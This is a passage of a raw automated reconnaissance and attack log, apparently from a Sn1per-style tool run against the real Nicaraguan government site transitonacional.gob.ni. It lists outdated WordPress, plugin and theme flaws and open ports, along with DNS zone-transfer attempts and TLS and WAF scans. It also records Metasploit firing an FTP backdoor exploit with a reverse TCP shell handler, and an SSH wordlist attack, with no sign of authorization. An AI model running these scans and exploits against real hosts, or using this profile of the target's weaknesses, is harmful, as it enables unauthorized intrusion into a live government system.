1052. [!] Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing
1053. Reference: https://wpvulndb.com/vulnerabilities/8969
1054. Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
1055. Reference: https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c
1056. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17091
1057. [i] Fixed in: 4.4.13
1058.  
1059. [!] Title: WordPress 3.7-4.9.1 - MediaElement Cross-Site Scripting (XSS)
1060. Reference: https://wpvulndb.com/vulnerabilities/9006
1061. Reference: https://github.com/WordPress/WordPress/commit/3fe9cb61ee71fcfadb5e002399296fcc1198d850
1062. Reference: https://wordpress.org/news/2018/01/wordpress-4-9-2-security-and-maintenance-release/
1063. Reference: https://core.trac.wordpress.org/ticket/42720
1064. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5776
1065. [i] Fixed in: 4.4.14
1066.  
1067. [!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
1068. Reference: https://wpvulndb.com/vulnerabilities/9021
1069. Reference: https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html
1070. Reference: https://github.com/quitten/doser.py
1071. Reference: https://thehackernews.com/2018/02/wordpress-dos-exploit.html
1072. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
1073.  
1074. [!] Title: WordPress 3.7-4.9.4 - Remove localhost Default
1075. Reference: https://wpvulndb.com/vulnerabilities/9053
1076. Reference: https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
1077. Reference: https://github.com/WordPress/WordPress/commit/804363859602d4050d9a38a21f5a65d9aec18216
1078. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10101
1079. [i] Fixed in: 4.4.15
1080.  
1081. [!] Title: WordPress 3.7-4.9.4 - Use Safe Redirect for Login
1082. Reference: https://wpvulndb.com/vulnerabilities/9054
1083. Reference: https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
1084. Reference: https://github.com/WordPress/WordPress/commit/14bc2c0a6fde0da04b47130707e01df850eedc7e
1085. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10100
1086. [i] Fixed in: 4.4.15
1087.  
1088. [!] Title: WordPress 3.7-4.9.4 - Escape Version in Generator Tag
1089. Reference: https://wpvulndb.com/vulnerabilities/9055
1090. Reference: https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
1091. Reference: https://github.com/WordPress/WordPress/commit/31a4369366d6b8ce30045d4c838de2412c77850d
1092. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10102
1093. [i] Fixed in: 4.4.15
1094.  
1095. [!] Title: WordPress <= 4.9.6 - Authenticated Arbitrary File Deletion
1096. Reference: https://wpvulndb.com/vulnerabilities/9100
1097. Reference: https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/
1098. Reference: http://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit/
1099. Reference: https://github.com/WordPress/WordPress/commit/c9dce0606b0d7e6f494d4abe7b193ac046a322cd
1100. Reference: https://wordpress.org/news/2018/07/wordpress-4-9-7-security-and-maintenance-release/
1101. Reference: https://www.wordfence.com/blog/2018/07/details-of-an-additional-file-deletion-vulnerability-patched-in-wordpress-4-9-7/
1102. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12895
1103. [i] Fixed in: 4.4.16
1104.  
1105. [+] WordPress theme in use: newsmag - v1.0
1106.  
1107. [+] Name: newsmag - v1.0
1108. | Last updated: 2017-07-28T00:00:00.000Z
1109. | Location: http://www.transitonacional.gob.ni/wp-content/themes/newsmag/
1110. [!] The version is out of date, the latest version is 2.3.8
1111. | Style URL: http://www.transitonacional.gob.ni/wp-content/themes/newsmag/style.css
1112. | Theme Name: NewsMag
1113. | Theme URI: http://mythemeshop.com/themes/newsmag
1114. | Description: NewsMag is a three column, responsive WordPress magazine theme that is built for sites with lots ...
1115. | Author: MyThemeShop
1116. | Author URI: http://mythemeshop.com/
1117.  
1118. [+] Enumerating plugins from passive detection ...
1119. | 6 plugins found:
1120.  
1121. [+] Name: contact-form-7
1122. | Latest version: 5.0.3
1123. | Last updated: 2018-07-12T12:37:00.000Z
1124. | Location: http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/
1125. [!] Directory listing is enabled: http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/
1126.  
1127. [!] We could not determine the version installed. All of the past known vulnerabilities will be output to allow you to do your own manual investigation.
1128.  
1129. [!] Title: Contact Form 7 <= 3.7.1 - Security Bypass
1130. Reference: https://wpvulndb.com/vulnerabilities/7020
1131. Reference: http://www.securityfocus.com/bid/66381/
1132. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2265
1133. [i] Fixed in: 3.7.2
1134.  
1135. [!] Title: Contact Form 7 <= 3.5.2 - File Upload Remote Code Execution
1136. Reference: https://wpvulndb.com/vulnerabilities/7022
1137. Reference: http://packetstormsecurity.com/files/124154/
1138. [i] Fixed in: 3.5.3
1139.  
1140. [+] Name: easy-collapse-accordion - v4.5
1141. | Latest version: 1.0 (up to date)
1142. | Last updated: 2013-12-26T00:50:00.000Z
1143. | Location: http://www.transitonacional.gob.ni/wp-content/plugins/easy-collapse-accordion/
1144. | Readme: http://www.transitonacional.gob.ni/wp-content/plugins/easy-collapse-accordion/README.md
1145. [!] Directory listing is enabled: http://www.transitonacional.gob.ni/wp-content/plugins/easy-collapse-accordion/
1146.  
1147. [+] Name: itro-popup
1148. | Latest version: 5.0.2
1149. | Last updated: 2017-07-02T08:03:00.000Z
1150. | Location: http://www.transitonacional.gob.ni/wp-content/plugins/itro-popup/
1151.  
1152. [+] Name: meteor-slides
1153. | Latest version: 1.5.6
1154. | Last updated: 2017-06-09T20:39:00.000Z
1155. | Location: http://www.transitonacional.gob.ni/wp-content/plugins/meteor-slides/
1156. | Readme: http://www.transitonacional.gob.ni/wp-content/plugins/meteor-slides/readme.md
1157. [!] Directory listing is enabled: http://www.transitonacional.gob.ni/wp-content/plugins/meteor-slides/
1158.  
1159. [+] Name: transito_grafico
1160. | Location: http://www.transitonacional.gob.ni/wp-content/plugins/transito_grafico/
1161. [!] Directory listing is enabled: http://www.transitonacional.gob.ni/wp-content/plugins/transito_grafico/
1162.  
1163. [+] Name: wp-super-cache
1164. | Latest version: 1.6.2
1165. | Last updated: 2018-06-19T09:49:00.000Z
1166. | Location: http://www.transitonacional.gob.ni/wp-content/plugins/wp-super-cache/
1167. [!] Directory listing is enabled: http://www.transitonacional.gob.ni/wp-content/plugins/wp-super-cache/
1168.  
1169. [!] We could not determine the version installed. All of the past known vulnerabilities will be output to allow you to do your own manual investigation.
1170.  
1171. [!] Title: WP-Super-Cache 1.3 - Remote Code Execution
1172. Reference: https://wpvulndb.com/vulnerabilities/6623
1173. Reference: http://www.acunetix.com/blog/web-security-zone/wp-plugins-remote-code-execution/
1174. Reference: http://wordpress.org/support/topic/pwn3d
1175. Reference: http://blog.sucuri.net/2013/04/update-wp-super-cache-and-w3tc-immediately-remote-code-execution-vulnerability-disclosed.html
1176. [i] Fixed in: 1.3.1
1177.  
1178. [!] Title: WP Super Cache 1.3 - trunk/wp-cache.php wp_nonce_url Function URI XSS
1179. Reference: https://wpvulndb.com/vulnerabilities/6624
1180. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
1181. [i] Fixed in: 1.3.1
1182.  
1183. [!] Title: WP Super Cache 1.3 - trunk/plugins/wptouch.php URI XSS
1184. Reference: https://wpvulndb.com/vulnerabilities/6625
1185. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
1186. [i] Fixed in: 1.3.1
1187.  
1188. [!] Title: WP Super Cache 1.3 - trunk/plugins/searchengine.php URI XSS
1189. Reference: https://wpvulndb.com/vulnerabilities/6626
1190. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
1191. [i] Fixed in: 1.3.1
1192.  
1193. [!] Title: WP Super Cache 1.3 - trunk/plugins/domain-mapping.php URI XSS
1194. Reference: https://wpvulndb.com/vulnerabilities/6627
1195. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
1196. [i] Fixed in: 1.3.1
1197.  
1198. [!] Title: WP Super Cache 1.3 - trunk/plugins/badbehaviour.php URI XSS
1199. Reference: https://wpvulndb.com/vulnerabilities/6628
1200. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
1201. [i] Fixed in: 1.3.1
1202.  
1203. [!] Title: WP Super Cache 1.3 - trunk/plugins/awaitingmoderation.php URI XSS
1204. Reference: https://wpvulndb.com/vulnerabilities/6629
1205. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
1206. [i] Fixed in: 1.3.1
1207.  
1208. [!] Title: WP Super Cache <= 1.4.2 - Stored Cross-Site Scripting (XSS)
1209. Reference: https://wpvulndb.com/vulnerabilities/7889
1210. Reference: http://blog.sucuri.net/2015/04/security-advisory-persistent-xss-in-wp-super-cache.html
1211. [i] Fixed in: 1.4.3
1212.  
1213. [!] Title: WP Super Cache <= 1.4.4 - Cross-Site Scripting (XSS)
1214. Reference: https://wpvulndb.com/vulnerabilities/8197
1215. Reference: http://z9.io/2015/09/25/wp-super-cache-1-4-5/
1216. [i] Fixed in: 1.4.5
1217.  
1218. [!] Title: WP Super Cache <= 1.4.4 - PHP Object Injection
1219. Reference: https://wpvulndb.com/vulnerabilities/8198
1220. Reference: http://z9.io/2015/09/25/wp-super-cache-1-4-5/
1221. [i] Fixed in: 1.4.5
1222.  
1223. [+] Finished: Wed Aug 8 10:17:00 2018
1224. [+] Elapsed time: 00:08:58
1225. [+] Requests made: 128
1226. [+] Memory used: 125.609 MB
1227. #######################################################################################################################################
1228. dnsenum VERSION:1.2.4
1229.  
1230. ----- transitonacional.gob.ni -----
1231.  
1232.  
1233. Host's addresses:
1234. __________________
1235.  
1236. transitonacional.gob.ni. 14399 IN A 50.87.39.91
1237.  
1238.  
1239. Name Servers:
1240. ______________
1241.  
1242. ns1.rhostbh.com. 11380 IN A 162.159.24.66
1243. ns2.rhostbh.com. 14399 IN A 162.159.25.91
1244.  
1245.  
1246. Mail (MX) Servers:
1247. ___________________
1248.  
1249. transitonacional.gob.ni. 14391 IN A 50.87.39.91
1250.  
1251.  
1252. Trying Zone Transfers and getting Bind Versions:
1253. _________________________________________________
1254.  
1255.  
1256. Trying Zone Transfer for transitonacional.gob.ni on ns1.rhostbh.com ...
1257.  
1258. Trying Zone Transfer for transitonacional.gob.ni on ns2.rhostbh.com ...
1259.  
1260. brute force file not specified, bay.
1261. #######################################################################################################################################
1262. Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-08 10:04 EDT
1263. Warning: 50.87.39.91 giving up on port because retransmission cap hit (2).
1264. Nmap scan report for transitonacional.gob.ni (50.87.39.91)
1265. Host is up (0.83s latency).
1266. rDNS record for 50.87.39.91: 50-87-39-91.unifiedlayer.com
1267. Not shown: 453 closed ports, 11 filtered ports
1268. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
1269. PORT STATE SERVICE
1270. 21/tcp open ftp
1271. 22/tcp open ssh
1272. 80/tcp open http
1273. 110/tcp open pop3
1274. 143/tcp open imap
1275. 443/tcp open https
1276. 465/tcp open smtps
1277. 587/tcp open submission
1278. 993/tcp open imaps
1279. 995/tcp open pop3s
1280. 8080/tcp open http-proxy
1281. 8443/tcp open https-alt
1282.  
1283. Nmap done: 1 IP address (1 host up) scanned in 8.93 seconds
1284. #######################################################################################################################################
1285. Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-08 10:04 EDT
1286. Nmap scan report for transitonacional.gob.ni (50.87.39.91)
1287. Host is up.
1288. rDNS record for 50.87.39.91: 50-87-39-91.unifiedlayer.com
1289.  
1290. PORT STATE SERVICE
1291. 53/udp open|filtered domain
1292. 67/udp open|filtered dhcps
1293. 68/udp open|filtered dhcpc
1294. 69/udp open|filtered tftp
1295. 88/udp open|filtered kerberos-sec
1296. 123/udp open|filtered ntp
1297. 137/udp open|filtered netbios-ns
1298. 138/udp open|filtered netbios-dgm
1299. 139/udp open|filtered netbios-ssn
1300. 161/udp open|filtered snmp
1301. 162/udp open|filtered snmptrap
1302. 389/udp open|filtered ldap
1303. 520/udp open|filtered route
1304. 2049/udp open|filtered nfs
1305.  
1306. Nmap done: 1 IP address (1 host up) scanned in 4.07 seconds
1307. #######################################################################################################################################
1308. + -- --=[Port 21 opened... running tests...
1309. Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-08 10:04 EDT
1310. Nmap scan report for transitonacional.gob.ni (50.87.39.91)
1311. Host is up (0.16s latency).
1312. rDNS record for 50.87.39.91: 50-87-39-91.unifiedlayer.com
1313.  
1314. PORT STATE SERVICE VERSION
1315. 21/tcp filtered ftp
1316. Too many fingerprints match this host to give specific OS details
1317.  
1318. TRACEROUTE (using proto 1/icmp)
1319. HOP RTT ADDRESS
1320. 1 ... 30
1321.  
1322. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
1323. Nmap done: 1 IP address (1 host up) scanned in 16.67 seconds
1324.  
1325. +-------------------------------------------------------+
1326. | METASPLOIT by Rapid7 |
1327. +---------------------------+---------------------------+
1328. | __________________ | |
1329. | ==c(______(o(______(_() | |""""""""""""|======[*** |
1330. | )=\ | | EXPLOIT \ |
1331. | // \\ | |_____________\_______ |
1332. | // \\ | |==[msf >]============\ |
1333. | // \\ | |______________________\ |
1334. | // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ |
1335. | // \\ | ********************* |
1336. +---------------------------+---------------------------+
1337. | o O o | \'\/\/\/'/ |
1338. | o O | )======( |
1339. | o | .' LOOT '. |
1340. | |^^^^^^^^^^^^^^|l___ | / _||__ \ |
1341. | | PAYLOAD |""\___, | / (_||_ \ |
1342. | |________________|__|)__| | | __||_) | |
1343. | |(@)(@)"""**|(@)(@)**|(@) | " || " |
1344. | = = = = = = = = = = = = | '--------------' |
1345. +---------------------------+---------------------------+
1346.  
1347.  
1348. =[ metasploit v4.17.3-dev ]
1349. + -- --=[ 1795 exploits - 1019 auxiliary - 310 post ]
1350. + -- --=[ 538 payloads - 41 encoders - 10 nops ]
1351. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
1352.  
1353. RHOST => transitonacional.gob.ni
1354. RHOSTS => transitonacional.gob.ni
1355. [+] 50.87.39.91:21 - FTP Banner: '220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\x0d\x0a220-You are user number 3 of 1000 allowed.\x0d\x0a220-Local time is now 08:05. Server port: 21.\x0d\x0a220-This is a private system - No anonymous login\x0d\x0a220-IPv6 connections are also welcome on this server.\x0d\x0a220 You will be disconnected after 15 minutes of inactivity.\x0d\x0a'
1356. [*] transitonacional.gob.ni:21 - Scanned 1 of 1 hosts (100% complete)
1357. [*] Auxiliary module execution completed
1358. [*] transitonacional.gob.ni:21 - Scanned 1 of 1 hosts (100% complete)
1359. [*] Auxiliary module execution completed
1360. [*] transitonacional.gob.ni:21 - Banner: 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
1361. 220-You are user number 3 of 1000 allowed.
1362. 220-Local time is now 08:05. Server port: 21.
1363. 220-This is a private system - No anonymous login
1364. 220-IPv6 connections are also welcome on this server.
1365. 220 You will be disconnected after 15 minutes of inactivity.
1366. [*] transitonacional.gob.ni:21 - USER: 331 User KuK:) OK. Password required
1367. [*] Exploit completed, but no session was created.
1368. [*] Started reverse TCP double handler on 10.211.1.13:4444
1369. [*] transitonacional.gob.ni:21 - Sending Backdoor Command
1370. [*] Exploit completed, but no session was created.
1371. + -- --=[Port 22 opened... running tests...
1372. [exception] did not receive banner.
1373. Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-08 10:06 EDT
1374. Nmap scan report for transitonacional.gob.ni (50.87.39.91)
1375. Host is up (0.083s latency).
1376. rDNS record for 50.87.39.91: 50-87-39-91.unifiedlayer.com
1377.  
1378. PORT STATE SERVICE VERSION
1379. 22/tcp filtered ssh
1380. Too many fingerprints match this host to give specific OS details
1381.  
1382. TRACEROUTE (using proto 1/icmp)
1383. HOP RTT ADDRESS
1384. 1 ... 30
1385.  
1386. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
1387. Nmap done: 1 IP address (1 host up) scanned in 21.72 seconds
1388.  
1389.  
1390. .:okOOOkdc' 'cdkOOOko:.
1391. .xOOOOOOOOOOOOc cOOOOOOOOOOOOx.
1392. :OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO:
1393. 'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
1394. oOOOOOOOO. .oOOOOoOOOOl. ,OOOOOOOOo
1395. dOOOOOOOO. .cOOOOOc. ,OOOOOOOOx
1396. lOOOOOOOO. ;d; ,OOOOOOOOl
1397. .OOOOOOOO. .; ; ,OOOOOOOO.
1398. cOOOOOOO. .OOc. 'oOO. ,OOOOOOOc
1399. oOOOOOO. .OOOO. :OOOO. ,OOOOOOo
1400. lOOOOO. .OOOO. :OOOO. ,OOOOOl
1401. ;OOOO' .OOOO. :OOOO. ;OOOO;
1402. .dOOo .OOOOocccxOOOO. xOOd.
1403. ,kOl .OOOOOOOOOOOOO. .dOk,
1404. :kk;.OOOOOOOOOOOOO.cOk:
1405. ;kOOOOOOOOOOOOOOOk:
1406. ,xOOOOOOOOOOOx,
1407. .lOOOOOOOl.
1408. ,dOd,
1409. .
1410.  
1411. =[ metasploit v4.17.3-dev ]
1412. + -- --=[ 1795 exploits - 1019 auxiliary - 310 post ]
1413. + -- --=[ 538 payloads - 41 encoders - 10 nops ]
1414. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
1415.  
1416. USER_FILE => /brutex/wordlists/simple-users.txt
1417. RHOSTS => transitonacional.gob.ni
1418. RHOST => transitonacional.gob.ni
1419. [+] 50.87.39.91:22 - SSH server version: SSH-2.0-OpenSSH_5.3 ( service.version=5.3 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.protocol=ssh fingerprint_db=ssh.banner )
1420. [*] transitonacional.gob.ni:22 - Scanned 1 of 1 hosts (100% complete)
1421. [*] Auxiliary module execution completed
1422. [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE.
1423. [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE, KEY_FILE.
1424. [+] 50.87.39.91:22 - SSH server version: SSH-2.0-OpenSSH_5.3 ( service.version=5.3 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.protocol=ssh fingerprint_db=ssh.banner )
1425. [*] transitonacional.gob.ni:22 - Scanned 1 of 1 hosts (100% complete)
1426. [*] Auxiliary module execution completed
1427. #######################################################################################################################################
1428. ERROR:root:Site http://transitonacional.gob.ni appears to be down
1429.  
1430. ^ ^
1431. _ __ _ ____ _ __ _ _ ____
1432. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
1433. | V V // o // _/ | V V // 0 // 0 // _/
1434. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
1435. <
1436. ...'
1437.  
1438. WAFW00F - Web Application Firewall Detection Tool
1439.  
1440. By Sandro Gauci && Wendel G. Henrique
1441.  
1442. Checking http://transitonacional.gob.ni
1443.  
1444. http://transitonacional.gob.ni [301 Moved Permanently] Country[UNITED STATES][US], HTTPServer[nginx/1.14.0], IP[50.87.39.91], PHP[5,5.2.17], RedirectLocation[http://www.transitonacional.gob.ni/], UncommonHeaders[x-acc-exp,x-proxy-cache], X-Powered-By[PHP/5.2.17], nginx[1.14.0]
1445. http://www.transitonacional.gob.ni/ [200 OK] Country[UNITED STATES][US], Email[info@transitonacional.gob.ni,transitonacional@gmail.com], Facebook-Plugin[likebox], Frame, Google-API[ajax/libs/jquery/1/jquery.min.js], Google-Analytics[Universal][UA-53950533-1], HTML5, HTTPServer[nginx/1.14.0], IP[50.87.39.91], JQuery[1.11.1,1.7.1], Modernizr, PHP[5,5.2.17], Script[text/javascript], Title[Dirección de Seguridad de Transito], UncommonHeaders[wp-super-cache,x-acc-exp,x-proxy-cache], WordPress[4.4.2], WordpressSuperCache, X-Powered-By[PHP/5.2.17], YouTube, nginx[1.14.0]
1446. #######################################################################################################################################
1447.  
1448. wig - WebApp Information Gatherer
1449.  
1450.  
1451. Scanning http://www.transitonacional.gob.ni...
1452. ________________________________________ SITE INFO ________________________________________
1453. IP Title
1454. 50.87.39.91 Dirección de Seguridad de Transito
1455.  
1456. _________________________________________ VERSION _________________________________________
1457. Name Versions Type
1458. WordPress 4.4.2 CMS
1459. PHP 5.2.17 Platform
1460. nginx 1.14.0 Platform
1461. OpenBSD 4.9 OS
1462.  
1463. _______________________________________ INTERESTING _______________________________________
1464. URL Note Type
1465. /readme.html Wordpress readme Interesting
1466. /readme.html Readme file Interesting
1467. /robots.txt robots.txt index Interesting
1468. /login/ Login Page Interesting
1469.  
1470. __________________________________________ TOOLS __________________________________________
1471. Name Link Software
1472. wpscan https://github.com/wpscanteam/wpscan WordPress
1473. CMSmap https://github.com/Dionach/CMSmap WordPress
1474.  
1475. _____________________________________ VULNERABILITIES _____________________________________
1476. Affected #Vulns Link
1477. WordPress 4.4.2 1 http://cvedetails.com/version/200899
1478.  
1479. ___________________________________________________________________________________________
1480. Time: 305.0 sec Urls: 351 Fingerprints: 40401
1481. #######################################################################################################################################
1482. HTTP/1.1 301 Moved Permanently
1483. Server: nginx/1.14.0
1484. Date: Wed, 08 Aug 2018 14:15:37 GMT
1485. Content-Type: text/html; charset=UTF-8
1486. Connection: keep-alive
1487. X-Powered-By: PHP/5.2.17
1488. Vary: Cookie,Accept-Encoding
1489. Location: http://www.transitonacional.gob.ni/
1490. #######################################################################################################################################
1491. [+] Screenshot saved to /usr/share/sniper/loot/transitonacional.gob.ni/screenshots/transitonacional.gob.ni-port80.jpg
1492. + -- --=[Port 110 opened... running tests...
1493. Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-08 10:15 EDT
1494. Nmap scan report for transitonacional.gob.ni (50.87.39.91)
1495. Host is up (0.38s latency).
1496. rDNS record for 50.87.39.91: 50-87-39-91.unifiedlayer.com
1497.  
1498. PORT STATE SERVICE VERSION
1499. 110/tcp filtered pop3
1500. Too many fingerprints match this host to give specific OS details
1501. Network Distance: 1 hop
1502.  
1503. TRACEROUTE (using port 443/tcp)
1504. HOP RTT ADDRESS
1505. 1 612.95 ms 50-87-39-91.unifiedlayer.com (50.87.39.91)
1506. #######################################################################################################################################
1507.  
1508. ^ ^
1509. _ __ _ ____ _ __ _ _ ____
1510. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
1511. | V V // o // _/ | V V // 0 // 0 // _/
1512. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
1513. <
1514. ...'
1515.  
1516. WAFW00F - Web Application Firewall Detection Tool
1517.  
1518. By Sandro Gauci && Wendel G. Henrique
1519.  
1520. Checking https://transitonacional.gob.ni
1521. Generic Detection results:
1522. The site https://transitonacional.gob.ni seems to be behind a WAF or some sort of security solution
1523. Reason: Blocking is being done at connection/packet level.
1524. Number of requests: 10
1525.  
1526.  
1527.  
1528.  
1529. AVAILABLE PLUGINS
1530. -----------------
1531.  
1532. PluginCertInfo
1533. PluginHeartbleed
1534. PluginSessionRenegotiation
1535. PluginSessionResumption
1536. PluginCompression
1537. PluginOpenSSLCipherSuites
1538. PluginHSTS
1539. PluginChromeSha1Deprecation
1540.  
1541.  
1542.  
1543. CHECKING HOST(S) AVAILABILITY
1544. -----------------------------
1545.  
1546. transitonacional.gob.ni:443 => 50.87.39.91:443
1547.  
1548.  
1549.  
1550. SCAN RESULTS FOR TRANSITONACIONAL.GOB.NI:443 - 50.87.39.91:443
1551. --------------------------------------------------------------
1552.  
1553. * Deflate Compression:
1554. OK - Compression disabled
1555.  
1556. * Session Renegotiation:
1557. Client-initiated Renegotiations: OK - Rejected
1558. Secure Renegotiation: OK - Supported
1559.  
1560. * Certificate - Content:
1561. SHA1 Fingerprint: 2d9ccc86afb7bba2a486e3d1dd7816596ebd3365
1562. Common Name: *.rhostbh.com
1563. Issuer: COMODO RSA Domain Validation Secure Server CA
1564. Serial Number: 8DB1D4FBDB8DE1FC9A9AA0BEBEB4BADC
1565. Not Before: Feb 9 00:00:00 2016 GMT
1566. Not After: Feb 8 23:59:59 2019 GMT
1567. Signature Algorithm: sha256WithRSAEncryption
1568. Public Key Algorithm: rsaEncryption
1569. Key Size: 4096 bit
1570. Exponent: 65537 (0x10001)
1571. X509v3 Subject Alternative Name: {'DNS': ['*.rhostbh.com', 'rhostbh.com']}
1572.  
1573. * Certificate - Trust:
1574. Hostname Validation: FAILED - Certificate does NOT match transitonacional.gob.ni
1575. Google CA Store (09/2015): OK - Certificate is trusted
1576. Java 6 CA Store (Update 65): OK - Certificate is trusted
1577. Microsoft CA Store (09/2015): OK - Certificate is trusted
1578. Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
1579. Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
1580. Certificate Chain Received: ['*.rhostbh.com', 'COMODO RSA Domain Validation Secure Server CA', 'COMODO RSA Certification Authority']
1581.  
1582. * Certificate - OCSP Stapling:
1583. NOT SUPPORTED - Server did not send back an OCSP response.
1584.  
1585. * Session Resumption:
1586. With Session IDs: PARTIALLY SUPPORTED (3 successful, 0 failed, 2 errors, 5 total attempts). Try --resum_rate.
1587. ERROR #1: timeout - timed out
1588. ERROR #2: timeout - timed out
1589. With TLS Session Tickets: OK - Supported
1590.  
1591. * SSLV2 Cipher Suites:
1592. Undefined - An unexpected error happened:
1593. RC4-MD5 timeout - timed out
1594. RC2-CBC-MD5 timeout - timed out
1595. IDEA-CBC-MD5 timeout - timed out
1596. EXP-RC4-MD5 timeout - timed out
1597. EXP-RC2-CBC-MD5 timeout - timed out
1598. DES-CBC3-MD5 timeout - timed out
1599. DES-CBC-MD5 timeout - timed out
1600.  
1601. * SSLV3 Cipher Suites:
1602. Undefined - An unexpected error happened:
1603. SRP-RSA-3DES-EDE-CBC-SHA timeout - timed out
1604. SRP-DSS-3DES-EDE-CBC-SHA timeout - timed out
1605. SRP-3DES-EDE-CBC-SHA timeout - timed out
1606. SEED-SHA timeout - timed out
1607. RC4-SHA timeout - timed out
1608. RC4-MD5 timeout - timed out
1609. PSK-RC4-SHA timeout - timed out
1610. PSK-AES128-CBC-SHA timeout - timed out
1611. PSK-3DES-EDE-CBC-SHA timeout - timed out
1612. NULL-SHA256 timeout - timed out
1613. NULL-SHA timeout - timed out
1614. NULL-MD5 timeout - timed out
1615. IDEA-CBC-SHA timeout - timed out
1616. EXP-RC4-MD5 timeout - timed out
1617. EXP-RC2-CBC-MD5 timeout - timed out
1618. EXP-EDH-RSA-DES-CBC-SHA timeout - timed out
1619. EXP-EDH-DSS-DES-CBC-SHA timeout - timed out
1620. EXP-DES-CBC-SHA timeout - timed out
1621. EXP-ADH-RC4-MD5 timeout - timed out
1622. EXP-ADH-DES-CBC-SHA timeout - timed out
1623. EDH-RSA-DES-CBC3-SHA timeout - timed out
1624. EDH-RSA-DES-CBC-SHA timeout - timed out
1625. EDH-DSS-DES-CBC3-SHA timeout - timed out
1626. EDH-DSS-DES-CBC-SHA timeout - timed out
1627. ECDHE-RSA-RC4-SHA timeout - timed out
1628. ECDHE-RSA-NULL-SHA timeout - timed out
1629. ECDHE-RSA-DES-CBC3-SHA timeout - timed out
1630. ECDHE-ECDSA-RC4-SHA timeout - timed out
1631. ECDHE-ECDSA-NULL-SHA timeout - timed out
1632. ECDHE-ECDSA-DES-CBC3-SHA timeout - timed out
1633. ECDH-RSA-RC4-SHA timeout - timed out
1634. ECDH-RSA-NULL-SHA timeout - timed out
1635. ECDH-RSA-DES-CBC3-SHA timeout - timed out
1636. ECDH-RSA-AES128-SHA256 timeout - timed out
1637. ECDH-RSA-AES128-GCM-SHA256 timeout - timed out
1638. ECDH-ECDSA-RC4-SHA timeout - timed out
1639. ECDH-ECDSA-NULL-SHA timeout - timed out
1640. ECDH-ECDSA-DES-CBC3-SHA timeout - timed out
1641. ECDH-ECDSA-AES128-SHA timeout - timed out
1642. DH-RSA-DES-CBC3-SHA timeout - timed out
1643. DH-RSA-DES-CBC-SHA timeout - timed out
1644. DH-DSS-DES-CBC3-SHA timeout - timed out
1645. DH-DSS-DES-CBC-SHA timeout - timed out
1646. DES-CBC3-SHA timeout - timed out
1647. DES-CBC-SHA timeout - timed out
1648. CAMELLIA128-SHA timeout - timed out
1649. AES128-SHA256 timeout - timed out
1650. AES128-SHA timeout - timed out
1651. AES128-GCM-SHA256 timeout - timed out
1652. AECDH-RC4-SHA timeout - timed out
1653. AECDH-NULL-SHA timeout - timed out
1654. AECDH-DES-CBC3-SHA timeout - timed out
1655. ADH-RC4-MD5 timeout - timed out
1656. ADH-DES-CBC3-SHA timeout - timed out
1657. ADH-DES-CBC-SHA timeout - timed out
1658. ADH-CAMELLIA128-SHA timeout - timed out
1659. ADH-AES128-SHA timeout - timed out
1660.  
1661.  
1662.  
1663. SCAN COMPLETED IN 108.13 S
1664. --------------------------
1665. Version: 1.11.11-static
1666. OpenSSL 1.0.2-chacha (1.0.2g-dev)
1667.  
1668. Connected to 50.87.39.91
1669.  
1670. Testing SSL server transitonacional.gob.ni on port 443 using SNI name transitonacional.gob.ni
1671.  
1672. TLS Fallback SCSV:
